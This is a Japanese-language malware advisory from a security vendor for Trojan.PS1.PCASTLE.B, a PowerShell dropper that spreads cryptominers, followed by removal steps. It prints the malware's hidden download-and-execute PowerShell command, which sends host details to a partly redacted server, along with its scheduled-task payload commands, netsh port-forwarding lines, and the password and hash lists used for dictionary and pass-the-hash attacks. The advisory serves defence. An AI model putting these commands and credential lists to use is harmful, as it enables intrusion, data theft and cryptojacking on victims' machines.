Trojan.PS1.PCASTLE.B
TrojanDownloader:PowerShell/Credcalper (MICROSOFT); HEUR:Trojan.PowerShell.Generic (KASPERSKY); Mal/PSDL-J (SOPHOS)
Windows


マルウェアタイプ:
トロイの木馬型
破壊活動の有無:
なし
暗号化:
なし
感染報告の有無 :
はい
概要
トレンドマイクロは、このマルウェアをNoteworthy(要注意)に分類しました。
マルウェアは、ボット型マルウェア「Trojan.PS1.LUDICROUZ.A」によってダウンロードされる難読化されたPowerShellスクリプトです。このPowerShellスクリプトは、「Trojan.PS1.LUDICROUZ.A」のコンポーネントをダウンロードして実行するドロッパです。
マルウェアは、複数の拡散手法を使用して可能な限り多くのPCとサーバに仮想通貨発掘ツールを拡散する活動に関与しています。情報公開日時点で検出の多い国/地域は、中国、豪州、台湾、ベトナム、香港、インドです。
マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。
マルウェアは、特定の脆弱性を利用した感染活動を実行します。
詳細
侵入方法
マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。
インストール
マルウェアは、以下のファイルを作成します。
- %AppDataLocal%\kkk1.log
 - %AppDataLocal%\pp2.log
 - %AppDataLocal%\333.log
 - %AppDataLocal%\kk4.log
 - %AppDataLocal%\kk5.log
 
(註:%AppDataLocal%フォルダは、ローカルアプリケーションデータフォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\<ユーザ名>\Local Settings\Application Data" です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\<ユーザ名>\AppData\Local" です。)
マルウェアは、以下のプロセスを追加します。
- powershell Start-Process -FilePath cmd.exe -ArgumentList "/c powershell -nop -w hidden -ep bypass -c " + '"' + "IEX (New-Object Net.WebClient).downloadstring('" + "http://down.{BLOCKED}h.com/newol.dat?allv5" + 
"&mac={MAC Address}&av={List of AV Products}&version={OS Version}&bit={OS Architecture}&flag2=
False&domain={Domain Name}&user={Username}&PS={If Powershell-Enabled}" + "')" + '"" 
マルウェアは、以下の Mutex を作成し、メモリ上で自身の重複実行を避けます。
- Global\powerv5
 
情報漏えい
マルウェアは、以下の情報を収集します。
- OS Version
 - MAC Address
 - List of AV products from the victim's machine
 - OS Architecture
 - Username
 - Domain Name
 
その他
マルウェアは、以下の脆弱性を利用して感染活動を実行します。
<補足>
インストール
マルウェアは、以下のプロセスを追加します。
- powershell Start-Process -FilePath cmd.exe -ArgumentList "/c powershell -nop -w hidden -ep bypass -c " + '"' + "IEX (New-Object Net.WebClient).downloadstring('" + "http://down.{BLOCKED}h.com/newol.dat?allv5" + "&mac={MACアドレス}&av={セキュリティ対策製品の一覧}&version={OSのバージョン}&bit={OSアーキテクチャ}&flag2= False&domain={ドメイン名}&user={ユーザ名}&PS={If Powershell-Enabled}" + "')" + '""
 
情報漏えい
マルウェアは、以下の情報を収集します。
- OSのバージョン
 - MACアドレス
 - セキュリティ対策製品の一覧(感染コンピュータから)
 - OSのアーキテクチャ
 - ユーザ名
 - ドメイン名
 
その他
マルウェアは、以下を実行します。
- PingCastleスキャナを使用して、脆弱性を持つ攻撃対象コンピュータを特定する
 - 以下の認証情報を使って辞書攻撃を実行する
- ユーザ名:
- administrator
 
 - パスワード:
- 123456
 - password
 - PASSWORD
 - football
 - welcome
 - 1
 - 12
 - 21
 - 123
 - 321
 - 1234
 - 12345
 - 123123
 - 123321
 - 111111
 - 654321
 - 666666
 - 121212
 - 0
 - 222222
 - 888888
 - 1111
 - 555555
 - 1234567
 - 12345678
 - 123456789
 - 987654321
 - admin
 - abc123
 - abcd1234
 - abcd@1234
 - abc@123
 - p@ssword
 - P@ssword
 - p@ssw0rd
 - P@ssw0rd
 - P@SSWORD
 - P@SSW0RD
 - P@$$w0rd
 - P@$$word
 - P@$$w0rd
 - iloveyou
 - monkey
 - login
 - passw0rd
 - master
 - hello
 - qazwsx
 - password1
 - qwerty
 - baseball
 - qwertyuiop
 - superman
 - 1qaz2wsx
 - fuckyou
 - 123qwe
 - zxcvbn
 - pass
 - aaaaaa
 - love
 - administrator
 
 - パスワードのハッシュ:
- 32ed87bdb5fdc5e9cba88547376818d4
 - 8846f7eaee8fb117ad06bdd830b7586c
 - 7b592e4f8178b4c75788531b2e747687
 - 31fc0dc8f7dfad0e8bd7ccc3842f2ce9
 - 674e48b68c5cd0efd8f7e5faa87b3d1e
 - 69943c5e63b4d2c104dbbcc15138b72b
 - 588feb889288fb953b5f094d47d1565c
 - bcdf115fd9ba99336c31e176ee34b304
 - 3dbde697d71690a769204beb12283678
 - df54de3f3438343202c1dd523d0265be
 - 7ce21f17c0aee7fb9ceba532d0546ad6
 - 7a21990fcd3d759941e45c490f143d5f
 - 579110c49145015c47ecd267657d3174
 - af27efb60c7b238910efe2a7e0676a39
 - 2d7f1a5a61d3a96fb5159b5eef17adc6
 - 4057b60b514c5402dde3d29a1845c366
 - e8cd0e4a9e89eab931dc5338fcbec54a
 - 6920c58d0df184d829189c44fafb7ece
 - 3fa45a060bd2693ae4c05b601d05ca0c
 - ba07ba35933e5bf42dea4af8add09d1e
 - f1351ac828428d74f6da2968089fc91f
 - e84d037613721532e6b6d84d215854b6
 - 2f2d544c53b3031f24d63402ea7fb4f9
 - 328727b81ca05805a68ef26acb252039
 - 259745cb123a52aa2e693aaacca2db52
 - c22b315c040ae6e0efee3518d830362b
 - 162e829be112225fedf856e38e1c65fe
 - 209c6174da490caeb422f3fa5a7ae634
 - f9e37e83b83c47a93c2f09f66408631b
 - b3ec3e03e2a202cbd54fd104b8504fef
 - 4ed91524cb54eaacc17a185646fb7491
 - aa647b916a1fad374df9c30711d58a7a
 - a80c9cc3f8439ada25af064a874efe2d
 - 13b29964cc2480b4ef454c59562e675c
 - de26cce0356891a4a020e7c4957afc72
 - e19ccf75ee54e06b06a5907af13cef42
 - 30fcaa8ad9a496b3e17f7fbfacc72993
 - 41630abb825ca50da31ce1fac1e9f54d
 - f56a8399599f1be040128b1dd9623c29
 - 2e4dbf83aa056289935daea328977b20
 - f56a8399599f1be040128b1dd9623c29
 - b963c57010f218edc2cc3c229b5e4d0f
 - f2477a144dff4f216ab81f2ac3e3207d
 - e6bd4cdb1e447131b60418f31d0b81d6
 - b9f917853e3dbf6e6831ecce60725930
 - 6d3986e540a63647454a50e26477ef94
 - 066ddfd4ef0e9cd7c256fe77191ef43c
 - 152efbcfafeb22eabda8fc5e68697a41
 - 5835048ce94ad0564e29a924a03510ef
 - 2d20d252a479f485cdf5e171d93985bf
 - 320a78179516c385e35a93ffa0b1c4ac
 - 0d757ad173d2fc249ce19364fd64c8ec
 - 72f5cfa80f07819ccbcfb72feb9eb9b7
 - f67f5e3f66efd7298be6acd32eeeb27c
 - 1c4ecc8938fb93812779077127e97662
 - ad70819c5bc807280974d80f45982011
 - a836ef24f0a529688be2af1479a95411
 - 36aa83bdcab3c9fdaf321ca42a31c3fc
 - acb98fd0478427cd18949050c5e87b47
 - 85deeec2d12f917783b689ae94990716
 - a4141712f19e9dd5adf16919bb38a95c
 
 
 - ユーザ名:
 - 以下のURLのコンテンツをダウンロードしてメモリ内で実行する 
- http://p.{BLOCKED}h.com/upgrade.php?ver=3&mac={MACアドレス}&av={セキュリティ対策製品の一覧}
&ver={OSのバージョン}&bit={OSアーキテクチャ} - http://{BLOCKED}.{BLOCKED}.107.137/status.json?allv5&mac={MACアドレス}&av={セキュリティ対策製品の一覧} &version={OSのバージョン}&bit={OSアーキテクチャ}&flag2=False&domain={ドメイン名}&user={ユーザ名}&PS= {If Powershell-Enabled}&{感染の状況報告}&{マルウェアのディレクトリ\マルウェアのファイル名}
 
 - http://p.{BLOCKED}h.com/upgrade.php?ver=3&mac={MACアドレス}&av={セキュリティ対策製品の一覧}
 - 「pass the hash」攻撃を実行する。「pass the hash」攻撃に成功すると以下を実行する
- ファイル%User Startup%\run.batが存在する場合、削除する
 - 以下のファイルを作成する
- %Application Data%\sign.txt
 - %Application Data%\flashplayer.tmp
 - %User Startup%\FlashPlayer.lnk
 
 
 - 以下の作成されたログファイルの存在を確認し、ファイルが存在しない場合は活動を実行する 
- kkk1.logが存在しない場合
- 管理者権限がある場合
- URL”http://v.{BLOCKED}h.net/g?h{'yyMMdd'の形式の感染日時}”に接続して、不正なコードをダウンロードして実行する
 - スケジュールされたタスクを作成する
- タスク名: \Microsoft\windows\{MACアドレス}
 - アクション: powershell -nop -ep bypass -e [http://v.y6h.net/g?h{'yyMMdd'の形式の感染日時}からの不正なコード]
 
 
 - 上記以外の場合
- URL”http://v.{BLOCKED}h.net/g?h{'yyMMdd'の形式の感染日時}”に接続して、不正なコードをダウンロードして実行する
 - スケジュールされたタスクを作成する
- タスク名: {MACアドレス}
 - アクション: powershell -nop -ep bypass -e [http://v.{BLOCKED}h.net/g?l{'yyMMdd'の形式の感染日時}からの不正なコード]
 
 
 
 - 管理者権限がある場合
 
 - kkk1.logが存在しない場合
 - pp2.logが存在しない場合
- ディレクトリの作成: %Application Data%\Microsoft
ファイル%Application Data%\ Microsoft \ cred.ps1の存在を確認し、存在しない場合、http://down.{BLOCKED}h.com/new.dat?allv5&mac={MACアドレス}&av={セキュリティ対対策製品の一覧}&version={OSのバージョン}&bit={OSのアーキテクチャ}&flag2=False&domain={ドメイン名}&user={ユーザ名}&PS={If Powershell-Enabled}に接続して、不正なファイルをダウンロードして、ファイル名%Application Data%\Microsoft\cred.ps1として保存する - スケジュールされたタスクを作成し実行する
- タスク名: Credentials
 - アクション: powershell -nop -w hidden -ep bypass -f %Application Data%\Microsoft\cred.ps1
 
 
 - ディレクトリの作成: %Application Data%\Microsoft
 - 333.logが存在しない場合
- http://down.{BLOCKED}h.com/mn.dat?allv5&mac={MACアドレス}&av={セキュリティ対策製}&version={OSのバージョン}&bit={OS のアーキテクチャ}&flag2=False&domain={ドメイン名}&user={ユーザ名}&PS={If Powershell-Enabled}に接続して、不正なファイルをダウンロードし、ファイル名%AppDataLocal%\mn.exeとして保存する
 - %AppDataLocal%\mn.exeの実行
 
 - kk4.logが存在しない場合
- http://down.{BLOCKED}h.com/ii.dat?p=allv5&mac={MACアドレス}&av={セキュリティ対策製品の一覧}&version={OS のバージョン}&bit={OS のアーキテクチャ}&flag2=False&domain={ドメイン名}&user={ユーザ名}&PS={If Powershell-Enabled} に接続して、不正なファイルをダウンロードして、ファイル名%AppDataLocal%\{ランダムな4-8文字 }.exeとして保存する
 - さらに
- 管理者権限がある場合
- スケジュールされたタスクを作成する
- タスク名: \Microsoft\Windows\{ランダムな4-8文字}
 - Action: %AppDataLocal%\{ランダムな4-8文字}.exe
 
 
 - スケジュールされたタスクを作成する
 - 管理者権限でない場合
- ダウンロードしたファイルの自動実行に使用するスクリプトファイル%AppDataLocal%\ run.vbsを作成する
 - スケジュールされたタスクを作成する
- タスク名: {ランダムな4-8文字}
 - アクション: %AppDataLocal%\run.vbs
 
 
 - kk5.logが存在しない場合
- http://down.{BLOCKED}h.com/ddd.dat?allv5&mac={MACアドレス}&av={セキュリティ対策製品の一覧}&version={OSのバージョン}&bit={OSのアーキテクチャ}&flag2=False&domain={ドメイン名}&user={ユーザ名}&PS={If Powershell-Enabled} に接続し、不正なファイルをダウンロードしてファイル名%AppDataLocal%\ddd.exeとして保存する
 - %AppDataLocal%\ddd.exeの実行
 
 
 - 管理者権限がある場合
 - 辞書攻撃に成功すると、マルウェアは、以下を実行する
- 以下のプロセスを実行する
- netsh.exe firewall add portopening tcp 65533 DNS
 - netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53
 
 - スケジュールされたタスクを作成する
- タスク名: \Microsoft\windows\Bluetooths
 - アクション: powershell -nop -ep bypass -e {base64でエンコードされたコマンド}
 
 
 - 以下のプロセスを実行する
 
 
対応方法
手順 1
Windows XP、Windows Vista および Windows 7 のユーザは、コンピュータからマルウェアもしくはアドウェア等を完全に削除するために、ウイルス検索の実行前には必ず「システムの復元」を無効にしてください。
手順 2
このマルウェアもしくはアドウェア等の実行により、手順中に記載されたすべてのファイル、フォルダおよびレジストリキーや値がコンピュータにインストールされるとは限りません。インストールが不完全である場合の他、オペレーティングシステム(OS)の条件によりインストールがされない場合が考えられます。手順中に記載されたファイル/フォルダ/レジストリ情報が確認されない場合、該当の手順の操作は不要ですので、次の手順に進んでください。
手順 3
「Trojan.PS1.PCASTLE.B」で検出したファイル名を確認し、そのファイルを終了します。
- すべての実行中プロセスが、Windows のタスクマネージャに表示されない場合があります。この場合、"Process Explorer" などのツールを使用しマルウェアのファイルを終了してください。"Process Explorer" については、こちらをご参照下さい。
 - 検出ファイルが、Windows のタスクマネージャまたは "Process Explorer" に表示されるものの、削除できない場合があります。この場合、コンピュータをセーフモードで再起動してください。
セーフモードについては、こちらをご参照下さい。 - 検出ファイルがタスクマネージャ上で表示されない場合、次の手順にお進みください。
 
手順 4
スケジュールされたタスクを削除する
タスク削除の手順に含まれる{タスク名} - {実行するタスク}には以下が当てはまります。
- \Microsoft\windows\{MAC Address} - powershell -nop -ep bypass -e [malicious code from http://v.y6h.net/g?h{date of infection in the format 'yyMMdd'}]
 - {MAC Address} - powershell -nop -ep bypass -e [malicious code from http://v.y6h.net/g?l{date of infection in the format 'yyMMdd'}]
 - Credentials - powershell -nop -w hidden -ep bypass -f %Application Data%\Microsoft\cred.ps1
 - \Microsoft\Windows\{random 4-8 characters} - %AppDataLocal%\{random 4-8 characters}.exe
 - {random 4-8 characters} - %AppDataLocal%\run.vbs
 - \Microsoft\windows\Bluetooths - powershell -nop -ep bypass -e {base64-encoded command}
 
Windows 2000、Windows XP、Windows Server 2003の場合:
- [スタート]→[プログラム]→[アクセサリ]→[システムツール]→[スケジュールされたタスク]をクリックして、スケジュールされたタスクを開きます。
 - 上記の{タスク名} を、[名前]の欄に入力します。
 - 入力した{タスク名} 持つファイルを右クリックします。
 - [プロパティ]をクリックします。 [実行]フィールドで、表示されている{実行するタスク}を確認します。
 - 上記の{実行するタスク}と文字列が一致するタスクを削除します。
 
Windows Vista、Windows 7、Windows Server 2008、Windows 8、Windows 8.1、およびWindows Server 2012の場合:
- Windowsタスクスケジューラを開きます。
• Windows Vista、Windows 7、Windows Server 2008の場合、[スタート]をクリックし、[検索]フィールドに「taskchd.msc」と入力してEnterキーを押します。
• Windows 8、Windows 8.1、Windows Server 2012の場合、画面の左下隅を右クリックし、[実行]をクリックし、「taskchd.msc」と入力してEnterキーを押します。 - 左側のパネルで、[タスクスケジューラライブラリ]をクリックします。
 - 中央上部のパネルで、上記の{タスク名}を[名前]の欄に入力します。
 - 中央下部のパネルで、[アクション]タブをクリックします。 [詳細]の欄で、{実行するタスク}を確認します。
 - 文字列が一致するタスクを削除します。
 
手順 5
以下のファイルを検索し削除します。
- %AppDataLocal%\kkk1.log
 - %AppDataLocal%\pp2.log
 - %AppDataLocal%\333.log
 - %AppDataLocal%\kk4.log
 - %AppDataLocal%\kk5.log
 - %AppDataLocal%\mn.exe
 - %AppDataLocal%\{random 4-8 characters}.exe
 - %AppDataLocal%\run.vbs
 - %AppDataLocal%\ddd.exe
 - %Application Data%\sign.txt
 - %Application Data%\flashplayer.tmp
 - %Application Data%\Microsoft\cred.ps1
 - %User Startup%\FlashPlayer.lnk
 
手順 6
最新のバージョン(エンジン、パターンファイル)を導入したウイルス対策製品を用い、ウイルス検索を実行してください。「Trojan.PS1.PCASTLE.B」と検出したファイルはすべて削除してください。 検出されたファイルが、弊社ウイルス対策製品により既に駆除、隔離またはファイル削除の処理が実行された場合、ウイルスの処理は完了しており、他の削除手順は特にありません。
ご利用はいかがでしたか? アンケートにご協力ください


